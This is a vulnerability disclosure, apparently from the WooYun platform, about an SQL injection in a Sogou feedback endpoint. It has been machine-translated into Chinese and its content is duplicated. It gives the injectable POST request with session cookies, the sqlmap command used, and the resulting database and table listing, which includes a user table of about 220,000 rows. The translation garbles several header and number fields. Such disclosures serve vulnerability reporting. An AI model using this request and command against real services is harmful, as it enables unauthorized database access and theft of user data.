漏洞标题 搜狗某处SQL注入泄露22w用户信息 相关制造商 搜狗 漏洞作者 黑色键盘丶 提交时间 2016-05-15 10: 24 公共时间 2016-06-30 08: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 注射技术 漏洞详细信息 http://fankui.help.sogou.com/index.php/web/web/index?type=6捕获包并阅读它。添加单引号以报告错误。

Sqlmap语法: sqlmap.py -r 1.txt --dbs ----------------数据包------- POST /index.php/web/web/addShenSu HTTP/1.1 主机: fankui.help.sogou.com 代理连接:保持活动状态 内容长度: 120 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://fankui.help.sogou.com X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6 Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320％2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260 参苏％5BwebAdr％5D=HTTP％3A％2F％2Fwww.sogou.com％2F＆安培;参苏％5Breason％5D=1＆安培;参苏％5Bcontact％5D=313％40q.com＆安培; webContactWayType= 数据库信息 可用的数据库[3]: [*] information_schema [*] sogou_zhanzhang [*]测试 当前库表信息 数据库: sogou_zhanzhang + ------------------------------- + --------- + |表|参赛作品| + ------------------------------- + --------- + Deadlink_wap_data | 15191050 | | url_submit | 547950 | | url_submit_view | 547950 | |网站| 270697 | | website_view | 270697 | | `user` | 220754 | |网站地图| 175918 | | sitemap_copy | 175417 | | sitemap_view | 168249 | | site_name | 73232 | | website_precision | 67856 | | site_name_view | 65060 | | fault_block_log | 54773 | | sitemap_wap | 52806 | | fault_block | 51056 | | sitemap_wap_view | 48773 | | sitemap_invitation | 45320 | | sitemap_invitation_view | 43771 | | site_icon | 42416 | | site_icon_view | 42067 | | spider_pressure_feedback | 31070 | | sitemap_invitation_log | 28583 | | site_logo | 27750 | | site_logo_view | 25608 | | site_name_log | 24155 | | spider_pressure_feedback_view | 23755 | Web2wap | 20046 | Web2wap_view | 19268 | | site_logo_log | 17607 | | renzheng_log | 16555 | | supply_fetch | 14501 | | site_icon_log | 13925 | | renzheng | 9324 | | fb_updateshensu | 5427 | | fb_shensu | 5341 | Web2wap_log | 4917 | | fb_img | 3720 | |重定向| 3696 | | redirection_view | 3696 | | tb_member | 3682 | |反馈| 3270 | | fb_tool | 2906 | | feedback_view | 2773 | | url_shoulu | 2577 | | umis_waitingfavicon_log | 2568 | | umis_waitingfavicon | 2520 | | site_param | 1992年| | sitemap_blacklist | 1917年| | site_param_view | 1825年| | website_precision_log | 1064 | | user_change_log | 968 | | redirection_log | 561 | | fb_suggestion | 289 | | fb_jubao | 201 | | fb_record | 153 | | renzheng_set | 106 | | fb_kuaizhao | 81 | | mail_view | 78 | | backend_user | 74 | | website_log | 63 | | product_black_list | 24 | | user_invitation | 19 | |通知| 18 | | fb_updatetool | 14 | | website_precision_maxid | 7 | |专栏作家| 5 | | partner_white_list | 5 | | mail_group | 1 | | site_param_log | 1 | + ------------------------------- + --------- + 漏洞证明： http://fankui.help.sogou.com/index.php/web/web/index?type=6捕获包并阅读它。添加单引号以报告错误。

Sqlmap语法: sqlmap.py -r 1.txt --dbs ----------------数据包------- POST /index.php/web/web/addShenSu HTTP/1.1 主机: fankui.help.sogou.com 代理连接:保持活动状态 内容长度: 120 接受: application/json，text/javascript，*/*; Q=0.01 来源:http://fankui.help.sogou.com X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0（Windows NT 6.1; WOW64）AppleWebKit/537.36（KHTML，与Gecko一样）Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://fankui.help.sogou.com/index.php/web/web/index?type=6 Accept-Encoding: gzip，deflate Accept-Language: zh-CN，zh; q=0.8 Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48 * D629; SUID=0E1649DE2208990A000000005734A933; m=45390 * EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [电子邮件 保护]/* @@@@@@@@@@; YYID=45390 * EEF5AF7959CC32A4FFB401114; LSTMV=320％2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260 参苏％5BwebAdr％5D=HTTP％3A％2F％2Fwww.sogou.com％2F＆安培;参苏％5Breason％5D=1＆安培;参苏％5Bcontact％5D=313％40q.com＆安培; webContactWayType= 数据库信息 可用的数据库[3]: [*] information_schema [*] sogou_zhanzhang [*]测试 当前库表信息 数据库: sogou_zhanzhang + ------------------------------- + --------- + |表|参赛作品| + ------------------------------- + --------- + Deadlink_wap_data | 15191050 | | url_submit | 547950 | | url_submit_view | 547950 | |网站| 270697 | | website_view | 270697 | | `user` | 220754 | |网站地图| 175918 | | sitemap_copy | 175417 | | sitemap_view | 168249 | | site_name | 73232 | | website_precision | 67856 | | site_name_view | 65060 | | fault_block_log | 54773 | | sitemap_wap | 52806 | | fault_block | 51056 | | sitemap_wap_view | 48773 | | sitemap_invitation | 45320 | | sitemap_invitation_view | 43771 | | site_icon | 42416 | | site_icon_view | 42067 | | spider_pressure_feedback | 31070 | | sitemap_invitation_log | 28583 | | site_logo | 27750 | | site_logo_view | 25608 | | site_name_log | 24155 | | spider_pressure_feedback_view | 23755 | Web2wap | 20046 | Web2wap_view | 19268 | | site_logo_log | 17607 | | renzheng_log | 16555 | | supply_fetch | 14501 | | site_icon_log | 13925 | | renzheng | 9324 | | fb_updateshensu | 5427 | | fb_shensu | 5341 | Web2wap_log | 4917 | | fb_img | 3720 | |重定向| 3696 | | redirection_view | 3696 | | tb_member | 3682 | |反馈| 3270 | | fb_tool | 2906 | | feedback_view | 2773 | | url_shoulu | 2577 | | umis_waitingfavicon_log | 2568 | | umis_waitingfavicon | 2520 | | site_param | 1992年| | sitemap_blacklist | 1917年| | site_param_view | 1825年| | website_precision_log | 1064 | | user_change_log | 968 | | redirection_log | 561 | | fb_suggestion | 289 | | fb_jubao | 201 | | fb_record | 153 | | renzheng_set | 106 | | fb_kuaizhao | 81 | | mail_view | 78 | | backend_user | 74 | | website_log | 63 | | product_black_list | 24 | | user_invitation | 19 | |通知| 18 | | fb_updatetool | 14 | | website_precision_maxid | 7 | |专栏作家| 5 | | partner_white_list | 5 | | mail_group | 1 | | site_param_log | 1 | + ------------------------------- + --------- + 修理计划： 过滤 版权声明：请注明出处。黑键盘丶@乌云